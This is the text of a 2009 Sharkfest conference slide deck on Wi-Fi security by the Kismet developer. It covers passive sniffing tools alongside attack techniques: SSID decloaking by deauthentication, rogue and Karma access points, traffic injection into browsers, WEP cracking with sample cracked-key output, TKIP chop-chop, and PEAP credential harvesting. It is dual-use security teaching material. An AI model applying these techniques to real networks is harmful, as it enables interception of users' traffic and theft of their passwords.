SHARKFEST '09 | Stanford University | June 15–18, 2009 Wifi Security Sharkfest '09 Mike Kershaw...

SHARKFEST '09 | Stanford University | June 15–18, 2009

Wifi SecuritySharkfest '09

Mike KershawKismetwireless.net

SHARKFEST '09Stanford UniversityJune 15-18, 2009


Who?

• Mike Kershaw (sometimes aka Dragorn)• Random OSS security developer (Kismet,

Lorcon, Spectools, other stuff)• Software Engineer at Aruba Networks in the

Aruba Threat Labs and Aruba OSS Labs


The Plan

• Speed-View of Old Kismet (boring)• New Kismet (the good stuff)• Spectrum Analysis• 802.11 Injection and Attacks• Future work• Q&A (aka “Audience does my work for me”)


Origins of Kismet

• Sumer of 2001, Airsnort released for Prism2 cards

• Modified it to show SSIDs• Asked if they wanted patches. They didn't.• Got a Cisco card which didn't talk prism2

netlink anyhow• Winter 2001, first Kismet release


How Kismet does its voodoo

• Kismet places the device in monitor mode aka rfmon

• Subtly different from promisc mode• Raw 802.11 packets with the headers intact• Gives us all packets the card sees, regardless

of packet type or channel overlap


The voodoo that it do (2)

• Seeing all the packets lets us:– Detect networks, even “cloaked” networks– Detect clients– Act as an 802.11 layer-2 IDS– Collect and decode/decrypt at a later date– Be a completely undetectable passive observer


Hello, my name is 802.11

• Detecting 802.11• It's really easy to do. Really easy.• Networks are fundamentally noisy.• “Look at me! I'm a network! This is my name!

Come talk to me!”• Even weird networks with squelched beacons

chat when someone joins• Cloaked networks? Not so much.


I'd like to talk to you

• Detecting 802.11 clients is as easy as detecting networks, in monitor mode

• If a client is talking to a network, you'll see it.• Every network a client looks for. “I'm looking

for SomeHighProfileDotCom, are you my mommy?”


Don't do that

• Snort is a great OSS IDS but doesn't have many rules for 802.11 layer 2

• Kismet already looks at all the packets anyhow• Stateless IDS (fingerprints)• Stateful (trends over time)• Flooding, DHCP abuse, fuzzing/driver attacks,

spoofing, etc


The boring UI


Still Boring


Kismet-Newcore

• Project name of a total rewrite of the Kismet base, now Kismet-2009-05-RC2 and newer (hooray, releases!)

• Primary goal: Fix complaints about Kismet usability, config difficulties, etc

• Old code “grew” - New code is designed


New stuff in Newcore

• Simpler configs• Live adding of sources• Smarter remote capture• Better error handling• New user interface• Better IDS• Plugins!


The exciting UI


More excitement


Further Thrills


Configuring Kismet

• Much easier now!• New security model similar to wireshark; add

user to 'kismet' group• Source types autodetected in most situations– ncsource=wlan0

• Run-time source adding• Run-time configuration of UI


Live Export

• Virtual network device with tun/tap• Fake 802.11 NIC• Realtime export for any pcap-aware tool

(wireshark, snort, packet-o-matic)• Aggregate local and remote sources• Homogenize packet headers


Plugins (not airfresheners)

• Can do anything Kismet can do• Define new capture sources and protocols

(DECT? Zigbee? Spec-An?)• Add new commands, IDS, logs• Add new widgets to the user interface• Visualize custom data


Kismet + DECT

• http://www.dedected.org• Com-On-Air DECT PCMCIA• Sniff cordless phones• Adds a full non-802.11 protocol to Kismet in

plugins (in 800 lines!)• Server and client plugins for logging and

display


Kismet + Dect (2)


Kismet + Spec-An

• Spectrum analysis• Uses Wi-Spy from MetaGeek• Logs spectrum data to PPI spectrum header on

pcap file• Display spectrum in Kismet UI• Correlate network events with spectrum

history


Kismet + Spec-An (2)


Mapping

• Old map code kind of useless• New map code in progress• Works with “popular map service”, rhymes

with “Foogle”• Arbitrarily large images• International support


Mapping Oslo


Mapping Zoom


Picking a Platform

• If you can, Linux is the best bet – It's what I use, and it's what Kismet is written on

• LiveCD distros like Backtrack are easy• Most cards have in-kernel drivers• Some out-of-kernel drivers may still be needed

(ralink 11n)


Pick a platform (2): Windows

• AirPCAP is a must• Only device with monitor mode on windows

with public drivers• May be possible to hack other drivers from

commercial sniffers, but I like not being sued• Cace supports OSS. Yay!


Pick a platform (3): OSX

• Airport drivers work (Broadcom, Atheros, with Apple drivers)

• Old airport classic don't really work anymore• USB will not work• KisMac can do USB, but is unrelated to Kismet,

uses embedded non-portable drivers


Pick a Platform (4): Faking it

• Kismet requires direct access to hardware with native drivers

• Virtualization with USB passthrough can work (VMWare, KVM, Parallels, Virtualbox)

• No way to use cardbus/pci/internal/pcmcia cards.


Related Tools

• Spectools– Spectrum Analysis for Cheap– Curses, GTK, network– Userspace USB drivers for Wi-Spy

• Lorcon– Loss Of Radio Control– Homogenizing injection across platforms– Same API for all drivers


Spectools

• GPL drivers for Wi-Spy• Developed with support from MetaGeek –

they “get” open source!• Works with all 3 Wi-Spy devices• Network-compatible with Windows• Find non-802.11 interference like jamming

attacks


Spectrum Sniffing


Sniffing 5GHz


LORCON

• Platform and driver neutral• Every driver has quirks; Do you write raw

packets? Rtap? Prism? Big endian? Host endian?

• Most injection tools were custom written for specific (now outdated) drivers


LORCON (2)

• Josh Wright and I decided per-driver custom apps sucks

• Any app using LORCON should work w/ any driver

• Functional modes provide “best fit”• Basic packet crafting library• Basic packet dissection (strip custom headers)


LORCON (3)

• Ported several apps to LORCON as proof-of-concept

• AirPwn running on Windows with Airpcap TX? Sure, why not.

• Raw packets with Metasploit? Sounds like a good idea!

• http://802.11ninja.net


Security Snake Oil: Cloaking

• SSID cloaking tries to hide the network SSID so clients can't connect

• Operative word: tries• SSID is not a protected field!• “Cloaking” simply hides the SSID in beacons.• Good thing we see all the packets then!


Snake Oil: Cloaking (2)

• Network->All: “I'm a network!”• Client->All: “I'm looking for a few good

networks. Who are you?”• Network->All: “Not gonna tell you.”• OtherClient->Network: “I want to join

SomeCloakedNet”• Network->Otherclient: “That sounds like me,

come on in.”



• All we have to do is wait for a client to join the network and capture the probe request/response

• Waiting sounds boring. I don't like boring.• How about we send a packet from the

network, to everyone, saying “Get out”?



• FakeNet->All: “Get out, now.”• All: “Oh no! I need to find a network!”• Client->Network: “I'm looking for

SomeCloakedNet again.”• Network->Client: “Sure, come on in.”


Snake Oil (5): MAC Filters

• “But”, someone says, “I don't need to turn on crypto, I have MAC filters!”

• No• Oh, that's the MAC of your client? I'll just be

joining now, thanks• Besides, none of your data is encrypted• You'll find out why this is a bad thing


Gut-Punching 802.11

• Absurdly easy• Management frames are completely

unprotected• It's shared media• All the bad old days for layer 2 attacks live

again• I don't have to own the Internet, I own your

Internet


Strangers with candy

• Avoiding hostile networks requires users to be smart; Users are bad decision makers

• The OS won't help; Most like to join networks they've joined before

• Networks go “viral” and appear everywhere• It's hard to tell what's real


Catch the virus

• “HP setup” “Free Public Wifi”• Once Windows has seen a network, it wants to

see it again• Can't find it? Make an ad-hoc network!• I like free. I like wi-fi. Let me join!• Now another system will advertise it


Free public wiffey

• Create AP named “Free Public Wifi”• Run “dnsmasq”• ????• Profit!• Windows happily joins the network• Why yes, I am your POP3 server. Why thank

you for that password.


Making things worse: Karma

• Creating access points manually is really kind of a pain

• Isn't there an easier way?• Modified drivers respond for every network

requested• “Are you FreePublicWifi?” Sure• “Are you MyCorpNet?” Why not?


Even worse: Karmetasploit

• Karma+Metasploit+Airbase• Become any AP. Become EVERY AP• Answer all DNS queries• Spoof common services like HTTP• Record all logins• You wanted Facebook? How about I give you

all the browser exploits instead. Tasty!


Man-in-the-Middle

• Why just spoof HTTP? Why not give you a real connection and let you log in? (and then read your email)

• SSL? Just give them a fake cert. A user would never accept one of those, right?

• “You encrypted the login, but you didn't move the bodies!”


Ignoring the network

• You know, after all, setting up this whole network framework just to attack a client is a big hassle

• Lets just rewrite their traffic in the air and own them that way

• Airpwn is underappreciated; Not just for serving shock-porn anymore!


Creative editing

• Lots of sites include little stubs of JS• Rhymes with “ShmaceHook” and “FlyMace”

and “Glitter”• Why not “enhance” them?• Once you have JS exec inside the page

domain, you win• Layer 2 hijacking of open and WEP data


Free candy inside

• Client->Server: “Give me a connection to 1.2.3.4:80”

• Attacker->Client: “I'm 1.2.3.4:80!”• Attacker->Server: “I'm Client! I changed my

mind.”• Attacker->Client: “Have some candy”


Constant interruptions

• Client->Server: “I want 1.2.3.4:80”• Server->Client: “OK”• Client->Server: “Give me /foo.js”• Attacker->Client: “I'm Server, here's foo.js”• Attacker->Server: “I'm Client. Go home.”


Not done yet

• Client->Server: “I want 1.2.3.4:80 /foo.js”• Server->Client: “Here's foo.js”• Attacker->Client: “No, no, theres more.”


Now I'm in your browser...

• … Rewriting your DOM• What can we do? Anything we want• Rewrite the page DOM to strip HTTPS• Redirect links• Replace text and images• Send cookies to a remote system• Remote-control the browser to do other

stuff


But it's just a little javascript

var embeds = document.getElementsByTagName('div');

for(var i=0; i < embeds.length; i++){ if (embeds[i].getAttribute("class") == "cnnT1Img") { embeds[i].innerHTML = "..."; } else if (embeds[i].getAttribute("class") == "cnnT1Txt") { embeds[i].innerHTML = "..."; }}


Cold, hard cache

• Discovered by Robert Hanson with VPNs• Feed a client some javascript• Set cache to infinity• What happens when they go back to

corporate HQ and load that?• Yup... I just started running JS inside your

corpnet a day later


Funeral for WEP

• Who here uses WEP?• If you raised your hand, now I'm going to

yell• WEP is flawed• Very flawed• Fatally flawed• The corpse is stinking, bury it before the

neighbors freak out


Breaking WEP

• Used to take hours and hundreds of thousands of packets

• Now takes minutes and as few as 20,000 packets

• ARP injection is obvious but works really well

• Or just wait!• Kismet-PTW plugin autocracks


No, seriously

Starting PTW attack with 29645 ivs.

KEY FOUND! [ 59:69:6E:67:57 ] (ASCII: YingW )

Decrypted correctly: 100%

real 0m0.708s

Cracked WEP in the wild with 30,000 ARP packets in less than a second; Took less than 2 minutes to generate packets via ARP injection

WEP is so cheap to crack there is no reason not to try every 100 packets to see if there is enough statistical data to crack it now


Home away from home

• Why wait for a client to find a network?• Caffe Latte attack uses only the client• Rewrite arp request to arp reply, send to

client, repeat• Cracked WEP and owned client in an airport.

Or a bus. Whatever


Attacking WPA

• At least it's better than WEP• WPA-PSK is only as secure as the passphrase• Passphrase + SSID + Length of SSID hashed

into PMK• PMK makes PTK per user• Computing PMK is hard


Look it up

• Computing PMK takes a while• So lets calculate the PMK for every

dictionary word plus the top 1000 SSIDs• Dictonary lookups are fast• Tables are big, but so what?• We can accelerate with CUDA and FPGA


Attacking TKIP

• TKIP was a stop-gap before 11i• TKIP is RC4. Wait. Isn't WEP RC4?• So doesn't... TKIP suck?• Kind of. They made it better• Per-packet keying, replay prevention,

passphrase conversion standards, PTK renegotiation


Countermeasures

• TKIP includes MIC countermeasures• Invalid packets cause the network to go sulk

in the corner and reset• Two invalids in 60 seconds cause the

network to go away• We can still guess, but we have to guess

slowly


Unintended side effects

• QoS defined after TKIP• Can re-order packets• Each queue has a packet count• This means we can re-use a packet from one

queue in the other queues• Four commonly used, but 12 more available


Chop chop!

• Cut the last byte off the packet• Fix the checksum• Inject• If we're wrong, nothing happens• If we're right, we get a spoof alert!• Wait 60 seconds, start on next byte


Not quite dead yet

• Not a complete break; Slow, only gets us a few packets

• Once we get a few we could initiate a connection outside though...

• Beginning of the end• Switch to WPA2 now before someone

finishes the job on WPA1


Attacking WPA-EAP

• Better than WPA-PSK• Commonly found on corporate networks• Many methods use PKI/TLS (SSL certificates)• No good way to distribute certs to all clients

at an institutional level• Spotty OS clients


I am who I say I am

• If UAC isn't used, deciding “good” certs can be in the hands of users

• Users always make good decisions, right?• That SSL cert says “Veri$ign”, good 'nuff!

(This is actually optimistic)• Obviously that tennis player wants me to

see her naked!


Even the smart ones...

• Often the OS supplicant isn't helpful• May not show all of the cert• Even if it does... Self signed vs real?• If two certs have a common root (Verisign?)

the CN may not be compared anyhow


Of course you're you

• Josh Wright and Brad Antoniewicz wrote a FreeRadius variant that accepts all logins

• Spoof a network and advertise PEAP• “Cert looks good to me!”• Combine with KARMA, own everyone who

connects• Harvest passwords


1 2 3 4 5

• PEAP gives us password as MSCHAPV2• If only there were a tool for that... like

L0phtCrack• Users also pick bad passwords• That's the same password as my luggage!


Future Plans

• More non-802.11 plugins (Zigbee, RFID)• More IDS• Integrate WPA-PSK decryption• Integrate WPA-EAP decryption with

provided certificates


Thanks, Q&A, Live Demo

• Thanks to CACE for having Sharkfest!• Thanks to everyone who has helped test

Kismet-Newcore on the long road to release

Q&A

SHARKFEST '09 | Stanford University | June 15–18, 2009 Wifi Security Sharkfest '09 Mike Kershaw...

Documents

Transcript of SHARKFEST '09 | Stanford University | June 15–18, 2009 Wifi Security Sharkfest '09 Mike Kershaw...